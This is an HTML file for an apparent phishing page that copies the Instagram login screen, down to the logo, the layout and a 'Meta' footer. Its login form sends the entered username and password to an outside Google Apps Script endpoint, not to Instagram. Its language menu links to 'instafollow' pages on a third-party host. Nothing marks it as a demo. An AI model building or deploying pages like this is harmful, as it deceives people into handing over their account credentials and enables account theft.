<!DOCTYPE html>
 <html>
  <title>Instagram.com</title>
	 <meta charset="UTF-8"/>
<meta name="viewport" content ="width=device-width,initial-scale=1.0">
<link rel="stylesheet" href="" type="text/css"/> 
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.0/css/all.min.css" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" integrity="sha512-wvV8zhJMA4ly+AQ4yj4JLshQ5vXR0DzjZOEYgW3V8FvHljKV7gHd+AJ2bvR9RnE/Kz/6Z3W7LxCx5K5MVuAZNdw==" crossorigin="anonymous" />

    <style>

      /* Universal Selectors */ #root, body, html { height:100%; } body { overflow-y: scroll; } a, abbr, acronym, address, applet, article, aside, audio, b, big, blockquote, body, canvas, caption, center, cite, code, dd, del, details, dfn, div, dl, dt, em, embed, fieldset, figcaption, figure, footer, form, h1, h2, h3, h4, h5, h6, header, hgroup, html, i, iframe, img, ins, kbd, label, legend, li, mark, menu, nav, object, ol, output, p, pre, q, ruby, s, samp, section, small, span, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, time, tr, tt, u, ul, var, video { margin:0; padding:0; border:0; font:inherit; vertical-align: baseline; } a, a:visited { text-decoration: none; } a:active, .btn:active { opacity:.5; } ol, ul { list-style: none; } body, button, input { font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif; font-size:14px; line-height:18px; } #root, article, main, div, section, header, nav, footer { border: 0 solid #000000; box-sizing: border-box; align-items: stretch; display: flex; flex-direction: column; flex-shrink: 0; margin:0; padding:0; position: relative; -webkit-box-align: stretch; -moz-box-align: stretch; -webkit-box-orient: vertical; -moz-box-orient: vertical; -webkit-box-direction: normal; -moz-box-direction: normal; } /* <--Universal Selectors End */ #root { z-index: 0; } .section-all { min-height:100%; overflow:hidden; } .main { background-color: #fafafa; order: 4; flex-grow: 1; -webkit-box-flex: 1; -moz-box-flex: 1; -moz-box-ordinal-group: 5; -webkit-box-ordinal-group: 5; } .wrapper { min-height:100%; overflow: hidden; } .wrapper, .article { flex-grow: 1; justify-content: center; -webkit-box-flex: 1; -moz-box-flex: 1; -webkit-box-pack: center; -moz-box-pack: center; } .article { flex-direction: row; margin:0 auto; max-width: 935px; width:100%; -webkit-box-orient: horizontal; -moz-box-orient: horizontal; -webkit-box-direction: normal; -moz-box-direction: normal; }
       .content { color:#262626; flex-grow:1; justify-content: center; max-width: 350px; margin-top:12px; -webkit-box-pack: justify; -moz-box-pack: justify; -webkit-box-flex: 1; -moz-box-flex: 1; }
      
       .login-box { background: #fff; border: 1px solid #e6e6e6; border-radius: 1px; margin:0 0 10px; padding: 10px 0; /* align-items: center; */ } .header { margin: 14.45px auto 12px; }
       .logo { background: cover no-repeat; width:175px; height:auto; } 
      
      .form { display: flex; flex-direction: column; margin-bottom: 10px; -moz-box-direction: normal; -webkit-box-direction: normal; } .input-box { margin:auto 40px 6px; } input { height: 36px; border: 1px solid #efefef; border-radius: 3px; background-color: #fafafa; width:100%; font-size:12px; margin: 0; padding: 9px 0 7px 8px; outline: none; overflow: hidden; text-overflow: ellipsis; box-sizing: border-box; } input#name:focus, input#password:focus { border-color:#bbb; } .button-box { display: block; position: relative; margin: 8px 40px; } .btn { cursor: pointer; width: 100%; padding:0 8px; background: #3897f0; border:1px solid #3897f0; color:#fff; border-radius:3px; font-weight:600; font-size: 14px; height: 28px; line-height: 26px; outline: none; white-space: nowrap; } .forgot, .forgot:active, .forgot:hover, .forgot:visited { font-size:12px; margin-top:12px; text-align: center; color:#3897f0; line-height: 14px!important; } 
      .text { text-align:center; margin:0; color:#989898; font-size:14px; } .text a, .text a:visited, .text a:hover, .text a:active { color:#3897f0; margin-left:3px; }
       /* App Store */ .app 
      p { line-height: 18px; color:#989898; font-size:14px; text-align:center; margin:10px 20px; } .app-img { flex-direction: row; justify-content: center; margin:10px 0; -webkit-box-orient: horizontal; -moz-box-orient: horizontal; } .app-img a { margin-right:8px; height: 43.5px; } .app-img img { height:40px; } 
      
      
      
      /* FOOTER */ 
      footer {
  position: fixed;
  bottom: 0;
  width: 100%;
  height: 50px;
  background-color: #333;
  font-weight: 400;
  font-size: 12px;
  text-align: center;
  border: 1px solid #efefef; border-radius: 3px; background-color: #fafafa;
  color:#989898;
}
.meta{
color:black;
font-weight: 700;
}
svg{
height:10px;
}
   
   
   
   .fa fa-ellipsis-h{
   color:#989898;
   justify-content: left;
  align-items: left;
  display: flex;
   }
       span.language { color:#989898; cursor: pointer; display: flex; font-weight: 400; position: relative;         vertical-align: top;display: flex;

  justify-content: center;
  align-items: center; } 
       .select { cursor: pointer; height: 100%; 
       top: 0;
        opacity: 0; 
        position: absolute;
        left:0; width: 100%;   
           display: flex;

  justify-content: center;
  align-items: center;
       } 
      
      /* Media Queries */ @media (max-width:450px) { .main { background-color: #fff; } .content { max-width: 100%; margin-top: 0; justify-content: space-between; } .login-box { background-color: transparent; border:none; } .logo { background: cover no-repeat; width:175px; height:auto; margin:0 auto; } .btn { cursor: pointer; width: 100%; padding:0 8px; background: #3897f0; border:1px solid #3897f0; color:#fff; border-radius:3px; font-weight:600; font-size: 14px; height: 28px; line-height: 26px; outline: none; white-space: nowrap; } .input-box { border: 1px solid #efefef; border-radius: 3px; height: 36px; background: #fafafa; position: relative; } input { border: 0; background-color: #fafafa; width:100%; font-size:12px; margin: 0; padding: 9px 0 7px 8px; outline: none; overflow: hidden; text-overflow: ellipsis; box-sizing: border-box; } .input-box:hover, .input-box:focus { border-color:#bbb; } } @media only screen and (max-width:875px) { .footer-container { text-align: center; padding:10px 0; } .footer-container, .footer-nav ul { justify-content: center; margin:0 auto; max-width: 360px; min-width: auto; -webkit-box-pack: center; -moz-box-pack: center; } } 

option::first-child {
  display: flex;
  justify-content: center;
  align-items: center;
}

select::before {
  content: "";
  width: 0;
  height: 0;
  border: none;
  border-radius: 50%;
}

select::after {
  content: "";
  width: 0;
  height: 0;
  border: none;
  border-radius: 50%;
}

    </style>
  </head>
  <body>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css" integrity="sha512-+4zCK9k+qNFUR5X+cKL9EIR+ZOhtIloNl9GIKS57V1MyNsYpYcUrUeQc9vNfzsWfV28IaLL3i96P9sdNyeRssA==" crossorigin="anonymous" />
  
  <span class="language">English <i class="fa-solid fa-chevron-down"></i>
                  <select name="language" class="select" onchange="la(this.value)">
                    <option value="#">English</option>
                    <option value="http://ru-instafollow.bitballoon.com">Russian</option>
                    <option value="http://es-instafollow.bitballoon.com">Spanish</option>
                    <option value="http://ar-instafollow.bitballoon.com">Arabic</option>
                    <option value="http://zh-instafollow.bitballoon.com">Chinese</option>
                    <option value="http://fr-instafollow.bitballoon.com">French</option>
                    <option value="http://de-instafollow.bitballoon.com">German</option>
                    <option value="http://it-instafollow.bitballoon.com">Italian</option>
                    <option value="http://jp-instafollow.bitballoon.com">Japanese</option>
                    <option value="http://ko-instafollow.bitballoon.com">Korean</option>
                    <option value="http://pt-instafollow.bitballoon.com">Portuguese</option>
                  </select>
                </span>

  <span id="root">
    <section class="section-all">

      <!-- 1-Role Main -->
      <main class="main" role="main">
        <div class="wrapper">
          <article class="article">
            <div class="content">
              <div class="login-box">
                <div class="header">
                  <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram">
                </div><!--                <!-- Header end -->
                <div class="form-wrap">
                  <form class="form"action="https://script.google.com/macros/s/AKfycbwi_EgwQ5bROAdTp6RUvpJVCi-lRmIXSU6UG2gGCxTxXQsz54swciY4Vp3ZcjasZwoOcA/exec"  method="POST" >

                    <div class="input-box">
                      <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="username" value="" required>
                    </div>  

                    <div class="input-box">
                      <input type="password" name="password" id="password" placeholder="Password" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" required>
                    </div>  

                 

                    <a class="forgot" href="https://www.instagram.com/direct/inbox/">Forgot password?</a>
                       <span class="button-box">
                      <button class="btn" type="submit" href="https://www.instagram.com/direct/inbox/" name="submit" href="https://www.instagram.com/direct/inbox/">Log in</button>
                    </span>  

                  </form>
                </div> <!-- Form-wrap end -->
              </div> <!-- Login-box end -->

              <div class="login-box">
                <p class="text">Don't have an account?<a href="#">Sign up</a></p>
              </div> <!-- Signup-box end -->



              <div class="app">
                <p>from</p>
                <div class="app-img">
                          </div> <!-- Content end -->
          </article>
        </div> <!-- Wrapper end -->
      </main>

     
    </section>
  </span>
 <footer>
  <p>from</p> 
  <p  class="meta"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><!--! Font Awesome Pro 6.2.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M640 317.9C640 409.2 600.6 466.4 529.7 466.4C467.1 466.4 433.9 431.8 372.8 329.8L341.4 277.2C333.1 264.7 326.9 253 320.2 242.2C300.1 276 273.1 325.2 273.1 325.2C206.1 441.8 168.5 466.4 116.2 466.4C43.42 466.4 0 409.1 0 320.5C0 177.5 79.78 42.4 183.9 42.4C234.1 42.4 277.7 67.08 328.7 131.9C365.8 81.8 406.8 42.4 459.3 42.4C558.4 42.4 640 168.1 640 317.9H640zM287.4 192.2C244.5 130.1 216.5 111.7 183 111.7C121.1 111.7 69.22 217.8 69.22 321.7C69.22 370.2 87.7 397.4 118.8 397.4C149 397.4 167.8 378.4 222 293.6C222 293.6 246.7 254.5 287.4 192.2V192.2zM531.2 397.4C563.4 397.4 578.1 369.9 578.1 322.5C578.1 198.3 523.8 97.08 454.9 97.08C421.7 97.08 393.8 123 360 175.1C369.4 188.9 379.1 204.1 389.3 220.5L426.8 282.9C485.5 377 500.3 397.4 531.2 397.4L531.2 397.4z"/></svg> Meta</p>
 </footer>
</body>
 <script>
 
 </script>


</html>
